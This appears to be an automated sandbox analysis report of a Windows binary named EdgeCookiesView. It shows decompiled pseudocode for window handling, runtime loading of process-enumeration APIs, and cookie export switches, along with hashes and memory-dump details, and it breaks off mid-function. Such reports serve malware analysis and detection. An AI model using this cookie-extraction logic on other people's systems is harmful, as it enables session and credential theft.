                                                                                                                                                      0x0040732c
                                                                                                                                                      0x0040733c
                                                                                                                                                      0x0040734d
                                                                                                                                                      0x0040735e
                                                                                                                                                      0x00407374
                                                                                                                                                      0x00407387
                                                                                                                                                      0x0040739e
                                                                                                                                                      0x004073a1
                                                                                                                                                      0x004073a8
                                                                                                                                                      0x004073ab
                                                                                                                                                      0x004073b3
                                                                                                                                                      0x004073bb
                                                                                                                                                      0x004073c3
                                                                                                                                                      0x004073cf

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004072BD
                                                                                                                                                      • memset.MSVCRT ref: 004072D9
                                                                                                                                                        • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                        • Part of subcall function 0040DE36: GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
                                                                                                                                                        • Part of subcall function 0040DE36: ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
                                                                                                                                                        • Part of subcall function 0040DE36: GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
                                                                                                                                                        • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
                                                                                                                                                        • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
                                                                                                                                                        • Part of subcall function 0040DE36: _snwprintf.MSVCRT ref: 0040DEE7
                                                                                                                                                        • Part of subcall function 0040DE36: wcscpy.MSVCRT ref: 0040DF11
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040731D
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040732C
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040733C
                                                                                                                                                      • EnumResourceNamesW.KERNEL32(;t@,00000004,00407047,00000000), ref: 004073A1
                                                                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,00407047,00000000), ref: 004073AB
                                                                                                                                                      • wcscpy.MSVCRT ref: 004073B3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                      • String ID: ;t@$H.A$RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                      • API String ID: 3037099051-2223684028
                                                                                                                                                      • Opcode ID: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
                                                                                                                                                      • Instruction ID: 5f8ecd76274f380d0de7cb04729dc73bacf1b7add2d1f3ba80cfb94e375ef893
                                                                                                                                                      • Opcode Fuzzy Hash: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
                                                                                                                                                      • Instruction Fuzzy Hash: 27217872A4021875C730B7529C46FCF3B6CDF44758F14047BB90CB60D2E6F96A988AAD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040B813, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 190windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E0040B813(intOrPtr __ecx, intOrPtr _a4, short _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t69;
				void* _t75;
				void* _t97;
				signed int _t105;
				void* _t108;
				intOrPtr _t115;
				signed char _t120;
				signed int _t124;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr* _t134;
				signed int _t136;
				void* _t139;

				_t129 = __ecx;
				_t118 = _a4;
				_t139 = _t118 - 0x402;
				_v8 = __ecx;
				if(_t139 > 0) {
					_t60 = _t118 - 0x415;
					__eflags = _t60;
					if(_t60 == 0) {
						E0040A459(__ecx);
						_t132 = _t129;
						L31:
						__eflags = 0;
						E0040A1DC(0, _t118, _t132, 0);
						L32:
						_t64 =  *((intOrPtr*)(_t129 + 0x6a0));
						if(_t64 != 0 && _a4 == _t64) {
							_t127 = _a12;
							_t120 =  *(_a12 + 0xc);
							_t148 = _t120 & 0x00000008;
							_t66 =  *((intOrPtr*)(_t129 + 0x69c));
							if((_t120 & 0x00000008) == 0) {
								__eflags = _t120 & 0x00000040;
								if((_t120 & 0x00000040) != 0) {
									 *0x412c2c =  *0x412c2c & 0x00000000;
									__eflags =  *0x412c2c;
									E004077CB(_t66);
								}
							} else {
								E0040990D(_t66, _t148, _t127);
							}
						}
						return E00401B1E(_t129, _a4, _a8, _a12);
					}
					_t69 = _t60 - 1;
					__eflags = _t69;
					if(_t69 == 0) {
						_t134 = __ecx + 0x69c;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x68))();
						_t118 =  *_t134;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x80))(0);
						L22:
						_t132 = _t129;
						E0040A3BF(_t129);
						goto L31;
					}
					_t75 = _t69 - 0x12;
					__eflags = _t75;
					if(__eflags == 0) {
						E004077CB( *((intOrPtr*)(__ecx + 0x69c)));
					} else {
						__eflags = _t75 - 0x41;
						if(__eflags == 0) {
							memcpy( *((intOrPtr*)(__ecx + 0x698)) + 0x228, __ecx + 0x744, 0x200c);
							E0040B00A(_t129);
						}
					}
					goto L32;
				}
				if(_t139 == 0) {
					_t38 = __ecx + 0x280;
					 *_t38 =  *(__ecx + 0x280) & 0x00000000;
					__eflags =  *_t38;
					goto L22;
				}
				if(_t118 == 6) {
					__eflags = _a8 - 1;
					if(__eflags == 0) {
						PostMessageW( *(__ecx + 0x208), 0x428, 0, 0);
					}
					goto L32;
				}
				if(_t118 == 0xc) {
					__eflags = E0040546C(_a12, L"EdgeCookiesView");
					if(__eflags == 0) {
						goto L32;
					}
					return 0;
				}
				if(_t118 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
					return 1;
				}
				if(_t118 == 0x2b) {
					_t115 = _a12;
					__eflags =  *((intOrPtr*)(_t115 + 0x14)) -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					__eflags =  *(__ecx + 0x694);
					if(__eflags != 0) {
						L14:
						SetBkMode( *(_t115 + 0x18), 1);
						SetTextColor( *(_t115 + 0x18), 0xff0000);
						_t97 = SelectObject( *(_t115 + 0x18),  *(_t129 + 0x694));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t131 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExW( *(_t131 + 0x18), _v8 + 0x492, 0xffffffff, _t131 + 0x1c, 0x24,  &_v28);
						SelectObject( *(_t131 + 0x18), _t97);
						_t129 = _v8;
						goto L32;
					}
					_t105 = GetDeviceCaps( *(_t115 + 0x18), 0x5a);
					asm("cdq");
					_t124 = 0x60;
					_t136 = _t105 * 0xe / _t124;
					_t108 =  *(__ecx + 0x694);
					__eflags = _t108;
					if(__eflags != 0) {
						DeleteObject(_t108);
						_t16 = __ecx + 0x694;
						 *_t16 =  *(__ecx + 0x694) & 0x00000000;
						__eflags =  *_t16;
					}
					 *(_t129 + 0x694) = E004058D4(_t136);
					goto L14;
				} else {
					if(_t118 == 0x7b) {
						_t126 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x69c)) + 0x2ac))) {
							E0040B607(__ecx, _t126);
						}
					}
					goto L32;
				}
			}

























                                                                                                                                                      0x0040b81c
                                                                                                                                                      0x0040b81e
                                                                                                                                                      0x0040b826
                                                                                                                                                      0x0040b828
                                                                                                                                                      0x0040b82b
                                                                                                                                                      0x0040b9cd
                                                                                                                                                      0x0040b9cd
                                                                                                                                                      0x0040b9d2
                                                                                                                                                      0x0040ba34
                                                                                                                                                      0x0040ba39
                                                                                                                                                      0x0040ba3b
                                                                                                                                                      0x0040ba3b
                                                                                                                                                      0x0040ba3d
                                                                                                                                                      0x0040ba42
                                                                                                                                                      0x0040ba42
                                                                                                                                                      0x0040ba4a
                                                                                                                                                      0x0040ba51
                                                                                                                                                      0x0040ba54
                                                                                                                                                      0x0040ba57
                                                                                                                                                      0x0040ba5a
                                                                                                                                                      0x0040ba60
                                                                                                                                                      0x0040ba6c
                                                                                                                                                      0x0040ba6f
                                                                                                                                                      0x0040ba71
                                                                                                                                                      0x0040ba71
                                                                                                                                                      0x0040ba78
                                                                                                                                                      0x0040ba78
                                                                                                                                                      0x0040ba62
                                                                                                                                                      0x0040ba65
                                                                                                                                                      0x0040ba65
                                                                                                                                                      0x0040ba60
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ba88
                                                                                                                                                      0x0040b9d4
                                                                                                                                                      0x0040b9d4
                                                                                                                                                      0x0040b9d5
                                                                                                                                                      0x0040ba17
                                                                                                                                                      0x0040ba21
                                                                                                                                                      0x0040ba24
                                                                                                                                                      0x0040ba2a
                                                                                                                                                      0x0040b9c2
                                                                                                                                                      0x0040b9c2
                                                                                                                                                      0x0040b9c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b9c4
                                                                                                                                                      0x0040b9d7
                                                                                                                                                      0x0040b9d7
                                                                                                                                                      0x0040b9da
                                                                                                                                                      0x0040ba10
                                                                                                                                                      0x0040b9dc
                                                                                                                                                      0x0040b9dc
                                                                                                                                                      0x0040b9df
                                                                                                                                                      0x0040b9f9
                                                                                                                                                      0x0040ba03
                                                                                                                                                      0x0040ba03
                                                                                                                                                      0x0040b9df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b9da
                                                                                                                                                      0x0040b831
                                                                                                                                                      0x0040b9bb
                                                                                                                                                      0x0040b9bb
                                                                                                                                                      0x0040b9bb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b9bb
                                                                                                                                                      0x0040b83a
                                                                                                                                                      0x0040b996
                                                                                                                                                      0x0040b99b
                                                                                                                                                      0x0040b9b0
                                                                                                                                                      0x0040b9b0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b99b
                                                                                                                                                      0x0040b843
                                                                                                                                                      0x0040b985
                                                                                                                                                      0x0040b989
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b98f
                                                                                                                                                      0x0040b84c
                                                                                                                                                      0x0040b94c
                                                                                                                                                      0x0040b952
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b96a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b972
                                                                                                                                                      0x0040b855
                                                                                                                                                      0x0040b881
                                                                                                                                                      0x0040b887
                                                                                                                                                      0x0040b88d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b893
                                                                                                                                                      0x0040b89a
                                                                                                                                                      0x0040b8d7
                                                                                                                                                      0x0040b8dc
                                                                                                                                                      0x0040b8ea
                                                                                                                                                      0x0040b8ff
                                                                                                                                                      0x0040b908
                                                                                                                                                      0x0040b909
                                                                                                                                                      0x0040b90a
                                                                                                                                                      0x0040b90b
                                                                                                                                                      0x0040b90c
                                                                                                                                                      0x0040b927
                                                                                                                                                      0x0040b92e
                                                                                                                                                      0x0040b935
                                                                                                                                                      0x0040b93f
                                                                                                                                                      0x0040b941
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b941
                                                                                                                                                      0x0040b8a1
                                                                                                                                                      0x0040b8aa
                                                                                                                                                      0x0040b8ad
                                                                                                                                                      0x0040b8b0
                                                                                                                                                      0x0040b8b2
                                                                                                                                                      0x0040b8b8
                                                                                                                                                      0x0040b8ba
                                                                                                                                                      0x0040b8bd
                                                                                                                                                      0x0040b8c3
                                                                                                                                                      0x0040b8c3
                                                                                                                                                      0x0040b8c3
                                                                                                                                                      0x0040b8c3
                                                                                                                                                      0x0040b8d1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b857
                                                                                                                                                      0x0040b85a
                                                                                                                                                      0x0040b866
                                                                                                                                                      0x0040b86f
                                                                                                                                                      0x0040b877
                                                                                                                                                      0x0040b877
                                                                                                                                                      0x0040b86f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b85a

                                                                                                                                                      APIs
                                                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0040B8A1
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B8BD
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040B8DC
                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040B8EA
                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040B8FF
                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 0040B935
                                                                                                                                                      • SelectObject.GDI32(00000014,00000000), ref: 0040B93F
                                                                                                                                                        • Part of subcall function 0040B607: GetCursorPos.USER32(?), ref: 0040B614
                                                                                                                                                        • Part of subcall function 0040B607: GetSubMenu.USER32 ref: 0040B622
                                                                                                                                                        • Part of subcall function 0040B607: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B64F
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040B95A
                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 0040B963
                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040B96A
                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040B9B0
                                                                                                                                                      • memcpy.MSVCRT ref: 0040B9F9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CursorObject$MenuSelectText$CapsColorDeleteDeviceDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
                                                                                                                                                      • String ID: EdgeCookiesView
                                                                                                                                                      • API String ID: 1858646182-2656830938
                                                                                                                                                      • Opcode ID: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
                                                                                                                                                      • Instruction ID: ea2783da8998489939a316812c4387a05210a4ff33434ae7ee18e9d7754e5edd
                                                                                                                                                      • Opcode Fuzzy Hash: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
                                                                                                                                                      • Instruction Fuzzy Hash: 4161BD71310205ABDB24AF64CC85BAAB7A5FF44310F10413AFA09B76E1D778AC618BDD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040CA5A, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040CA5A() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x413260 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryW(L"psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameW");
					 *0x4128e8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x4128e0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExW");
							 *0x4128d8 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x412b0c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x4128e4 = _t2;
									if(_t2 != 0) {
										 *0x413260 = 1;
									}
								}
							}
						}
					}
					if( *0x413260 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                                                                                                                      0x0040ca61
                                                                                                                                                      0x0040caf1
                                                                                                                                                      0x0040caf1
                                                                                                                                                      0x0040ca6d
                                                                                                                                                      0x0040ca73
                                                                                                                                                      0x0040ca77
                                                                                                                                                      0x0040caf0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ca79
                                                                                                                                                      0x0040ca86
                                                                                                                                                      0x0040ca8a
                                                                                                                                                      0x0040ca8f
                                                                                                                                                      0x0040ca97
                                                                                                                                                      0x0040ca9b
                                                                                                                                                      0x0040caa0
                                                                                                                                                      0x0040caa8
                                                                                                                                                      0x0040caac
                                                                                                                                                      0x0040cab1
                                                                                                                                                      0x0040cab9
                                                                                                                                                      0x0040cabd
                                                                                                                                                      0x0040cac2
                                                                                                                                                      0x0040caca
                                                                                                                                                      0x0040cace
                                                                                                                                                      0x0040cad3
                                                                                                                                                      0x0040cad5
                                                                                                                                                      0x0040cad5
                                                                                                                                                      0x0040cad3
                                                                                                                                                      0x0040cac2
                                                                                                                                                      0x0040cab1
                                                                                                                                                      0x0040caa0
                                                                                                                                                      0x0040cae7
                                                                                                                                                      0x0040caea
                                                                                                                                                      0x0040caea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cae7

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(psapi.dll,?,0040C284), ref: 0040CA6D
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040CA86
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040CA97
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040CAA8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040CAB9
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040CACA
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0040CAEA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                      • API String ID: 2449869053-70141382
                                                                                                                                                      • Opcode ID: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
                                                                                                                                                      • Instruction ID: 77b1fe70fa67b5f7b7b6e6a9f8f9c1ad54eab79ee609772bc806a346005bb9be
                                                                                                                                                      • Opcode Fuzzy Hash: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
                                                                                                                                                      • Instruction Fuzzy Hash: D101487078120ADDD751EB68AE84BAB3AF49B44B41B144237E405F12D4DBFC9882DF6C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040BCAA, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                      			E0040BCAA(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(L"/shtml");
				L0040E03E();
				if(__eax != 0) {
					_push(L"/sverhtml");
					L0040E03E();
					if(__eax != 0) {
						_push(L"/sxml");
						L0040E03E();
						if(__eax != 0) {
							_push(L"/stab");
							L0040E03E();
							if(__eax != 0) {
								_push(L"/sjson");
								L0040E03E();
								if(__eax != 0) {
									_push(L"/scomma");
									L0040E03E();
									if(__eax != 0) {
										_push(L"/scookiestxt");
										L0040E03E();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 4;
										return _t5;
									}
								} else {
									_t6 = 3;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 7;
							return _t8;
						}
					} else {
						_t9 = 6;
						return _t9;
					}
				} else {
					_t10 = 5;
					return _t10;
				}
			}









                                                                                                                                                      0x0040bcab
                                                                                                                                                      0x0040bcb0
                                                                                                                                                      0x0040bcb9
                                                                                                                                                      0x0040bcc0
                                                                                                                                                      0x0040bcc5
                                                                                                                                                      0x0040bcce
                                                                                                                                                      0x0040bcd5
                                                                                                                                                      0x0040bcda
                                                                                                                                                      0x0040bce3
                                                                                                                                                      0x0040bcea
                                                                                                                                                      0x0040bcef
                                                                                                                                                      0x0040bcf8
                                                                                                                                                      0x0040bcff
                                                                                                                                                      0x0040bd04
                                                                                                                                                      0x0040bd0d
                                                                                                                                                      0x0040bd14
                                                                                                                                                      0x0040bd19
                                                                                                                                                      0x0040bd22
                                                                                                                                                      0x0040bd29
                                                                                                                                                      0x0040bd2e
                                                                                                                                                      0x0040bd35
                                                                                                                                                      0x0040bd3f
                                                                                                                                                      0x0040bd24
                                                                                                                                                      0x0040bd26
                                                                                                                                                      0x0040bd27
                                                                                                                                                      0x0040bd27
                                                                                                                                                      0x0040bd0f
                                                                                                                                                      0x0040bd11
                                                                                                                                                      0x0040bd12
                                                                                                                                                      0x0040bd12
                                                                                                                                                      0x0040bcfa
                                                                                                                                                      0x0040bcfc
                                                                                                                                                      0x0040bcfd
                                                                                                                                                      0x0040bcfd
                                                                                                                                                      0x0040bce5
                                                                                                                                                      0x0040bce7
                                                                                                                                                      0x0040bce8
                                                                                                                                                      0x0040bce8
                                                                                                                                                      0x0040bcd0
                                                                                                                                                      0x0040bcd2
                                                                                                                                                      0x0040bcd3
                                                                                                                                                      0x0040bcd3
                                                                                                                                                      0x0040bcbb
                                                                                                                                                      0x0040bcbd
                                                                                                                                                      0x0040bcbe
                                                                                                                                                      0x0040bcbe

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                      • String ID: /scomma$/scookiestxt$/shtml$/sjson$/stab$/sverhtml$/sxml
                                                                                                                                                      • API String ID: 2081463915-1797186745
                                                                                                                                                      • Opcode ID: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
                                                                                                                                                      • Instruction ID: 8371893b6cdf142ed748882e6751911a4291a5e673982fbb48e018f7079fe289
                                                                                                                                                      • Opcode Fuzzy Hash: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
                                                                                                                                                      • Instruction Fuzzy Hash: 7C010C3228936569F9282577AD07B870649CB51BBAF30056FF924E81C1EFED8481605C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040C9D6, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C9D6() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x41325c != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x4128dc = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x4128d4 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x4128d0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x412664 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x4128c8 = _t2;
								if(_t2 != 0) {
									 *0x41325c = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                                                      0x0040c9dd
                                                                                                                                                      0x0040ca59
                                                                                                                                                      0x0040ca59
                                                                                                                                                      0x0040c9e5
                                                                                                                                                      0x0040c9eb
                                                                                                                                                      0x0040c9ef
                                                                                                                                                      0x0040ca58
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ca58
                                                                                                                                                      0x0040c9fe
                                                                                                                                                      0x0040ca02
                                                                                                                                                      0x0040ca07
                                                                                                                                                      0x0040ca0f
                                                                                                                                                      0x0040ca13
                                                                                                                                                      0x0040ca18
                                                                                                                                                      0x0040ca20
                                                                                                                                                      0x0040ca24
                                                                                                                                                      0x0040ca29
                                                                                                                                                      0x0040ca31
                                                                                                                                                      0x0040ca35
                                                                                                                                                      0x0040ca3a
                                                                                                                                                      0x0040ca42
                                                                                                                                                      0x0040ca46
                                                                                                                                                      0x0040ca4b
                                                                                                                                                      0x0040ca4d
                                                                                                                                                      0x0040ca4d
                                                                                                                                                      0x0040ca4b
                                                                                                                                                      0x0040ca3a
                                                                                                                                                      0x0040ca29
                                                                                                                                                      0x0040ca18
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0040C28B), ref: 0040C9E5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C9FE
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040CA0F
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040CA20
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040CA31
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040CA42
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                      • API String ID: 667068680-3953557276
                                                                                                                                                      • Opcode ID: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
                                                                                                                                                      • Instruction ID: 7b85a6ede3351e87d48595370c2c99752d77d7c7be9155cf3b7c884c9e88c84f
                                                                                                                                                      • Opcode Fuzzy Hash: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
                                                                                                                                                      • Instruction Fuzzy Hash: B2F06230651359D9C720EB256E80BEB2BE45785B40F149237E404F22D4EBBC84968FAC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004071D1, Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 42COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E004071D1(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E004057D1(_a4);
				if(_t3 != 0) {
					wcscpy(0x412c38, _a4);
					wcscpy(0x412e48, L"general");
